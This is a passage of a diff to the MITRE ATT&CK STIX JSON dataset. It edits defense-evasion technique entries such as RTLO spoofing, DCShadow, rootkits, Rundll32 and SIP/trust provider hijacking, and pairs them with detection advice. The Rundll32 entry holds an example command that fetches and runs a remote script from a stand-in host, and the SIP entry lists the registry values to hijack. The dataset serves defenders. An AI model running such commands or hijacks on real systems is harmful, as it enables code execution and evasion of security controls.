+ "x_mitre_detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage."
},
{
"id": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c",
- "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)",
"name": "Revert Cloud Instance",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"external_id": "T1536",
@@ -22117,6 +22856,36 @@
"description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019."
}
],
+ "revoked": true,
+ "type": "attack-pattern",
+ "modified": "2020-06-16T18:44:16.145Z",
+ "created": "2019-09-04T14:37:07.959Z"
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578.004",
+ "url": "https://attack.mitre.org/techniques/T1578/004"
+ },
+ {
+ "source_name": "Tech Republic - Restore AWS Snapshots",
+ "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/",
+ "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019."
+ },
+ {
+ "source_name": "Google - Restore Cloud Snapshot",
+ "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots",
+ "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Revert Cloud Instance",
+ "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)",
+ "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -22124,19 +22893,20 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T19:32:04.592Z",
- "created": "2019-09-04T14:37:07.959Z",
+ "modified": "2020-06-17T17:36:24.531Z",
+ "created": "2020-06-16T18:42:20.734Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
- "User",
- "Administrator"
+ "User"
],
"x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
"x_mitre_data_sources": [
- "AWS CloudTrail logs",
+ "Stackdriver logs",
+ "GCP audit logs",
"Azure activity logs",
- "Stackdriver logs"
+ "AWS CloudTrail logs"
],
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Netskope"
],
@@ -22144,10 +22914,25 @@
"AWS",
"GCP",
"Azure"
- ],
- "x_mitre_is_subtechnique": false
+ ]
},
{
+ "created": "2020-02-10T19:55:29.385Z",
+ "modified": "2020-03-29T20:16:36.316Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
+ "description": "Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.\n\nA common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
+ "name": "Right-to-Left Override",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -22170,22 +22955,6 @@
"description": "Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Right-to-Left Override",
- "description": "Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.\n\nA common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
- "id": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T20:16:36.316Z",
- "created": "2020-02-10T19:55:29.385Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -22247,9 +23016,16 @@
],
"modified": "2020-03-19T21:04:12.164Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Vincent Le Toux"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with \u201cGC/\u201d) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235\u20134B06\u201311D1-AB04\u201300C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.",
+ "x_mitre_defense_bypassed": [
+ "Log analysis"
],
"x_mitre_data_sources": [
"API monitoring",
@@ -22257,17 +23033,10 @@
"Network protocol analysis",
"Packet capture"
],
- "x_mitre_defense_bypassed": [
- "Log analysis"
+ "x_mitre_contributors": [
+ "Vincent Le Toux"
],
- "x_mitre_detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with \u201cGC/\u201d) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235\u20134B06\u201311D1-AB04\u201300C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
@@ -22316,35 +23085,93 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T23:30:21.364Z",
+ "modified": "2020-06-20T22:29:55.496Z",
"created": "2017-05-31T21:30:26.496Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "BIOS",
- "MBR",
- "System calls"
- ],
- "x_mitre_defense_bypassed": [
- "File monitoring",
- "Host intrusion prevention systems",
- "Process whitelisting",
- "Signature-based detection",
- "System access controls",
- "Whitelisting by file name or path",
- "Anti-virus"
- ],
- "x_mitre_detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "root"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root"
+ ],
+ "x_mitre_detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)",
+ "x_mitre_defense_bypassed": [
+ "File monitoring",
+ "Host intrusion prevention systems",
+ "Application control",
+ "Signature-based detection",
+ "System access controls",
+ "Application control by file name or path",
+ "Anti-virus"
+ ],
+ "x_mitre_data_sources": [
+ "BIOS",
+ "MBR",
+ "System calls"
+ ],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1564.006",
+ "url": "https://attack.mitre.org/techniques/T1564/006"
+ },
+ {
+ "source_name": "SingHealth Breach Jan 2019",
+ "url": "https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx",
+ "description": "Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited's Patient Database. Retrieved June 29, 2020."
+ },
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Run Virtual Instance",
+ "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)",
+ "id": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-07-06T19:03:40.330Z",
+ "created": "2020-06-29T15:36:41.535Z",
+ "x_mitre_detection": "Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a headless (in the background with no UI) virtual instance may be especially suspect. Network adapter information may also be helpful in detecting the use of virtual instances.\n\nIf virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \n\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.",
+ "x_mitre_contributors": [
+ "Janantha Marasinghe",
+ "Menachem Shafran, XM Cyber"
+ ],
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Host network interface",
+ "Windows Registry",
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5",
@@ -22373,7 +23200,7 @@
},
{
"id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
- "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)",
+ "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)",
"name": "Rundll32",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -22403,11 +23230,21 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T15:34:07.002Z",
+ "modified": "2020-06-20T22:31:42.113Z",
"created": "2020-01-23T18:03:46.248Z",
- "x_mitre_contributors": [
- "Casey Smith",
- "Ricardo Dias"
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"DLL monitoring",
@@ -22415,19 +23252,9 @@
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Application whitelisting",
- "Anti-virus"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Casey Smith",
+ "Ricardo Dias"
]
},
{
@@ -22456,6 +23283,22 @@
"created": "2019-04-09T16:09:22.173Z"
},
{
+ "created": "2020-03-02T14:30:05.252Z",
+ "modified": "2020-03-28T23:10:34.359Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "impact"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490",
+ "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+ "name": "Runtime Data Manipulation",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -22473,22 +23316,6 @@
"description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Runtime Data Manipulation",
- "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
- "id": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "impact"
- }
- ],
- "modified": "2020-03-28T23:10:34.359Z",
- "created": "2020-03-02T14:30:05.252Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -22614,24 +23441,24 @@
],
"modified": "2020-03-26T21:49:31.964Z",
"created": "2020-02-18T18:34:49.414Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Alain Homewood, Insomnia Security",
+ "Vincent Le Toux"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Examine data in user\u2019s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)",
"x_mitre_data_sources": [
"Windows event logs",
"Authentication logs",
"API monitoring"
],
- "x_mitre_detection": "Examine data in user\u2019s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Alain Homewood, Insomnia Security",
- "Vincent Le Toux"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -22752,7 +23579,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "SIP and Trust Provider Hijacking",
- "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application whitelisting tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. 
Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file\u2019s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP\u2019s CryptSIPDllVerifyIndirectData function, which validates a file\u2019s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). 
This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider\u2019s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP\u2019s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)",
+ "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. 
Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file\u2019s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP\u2019s CryptSIPDllVerifyIndirectData function, which validates a file\u2019s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). 
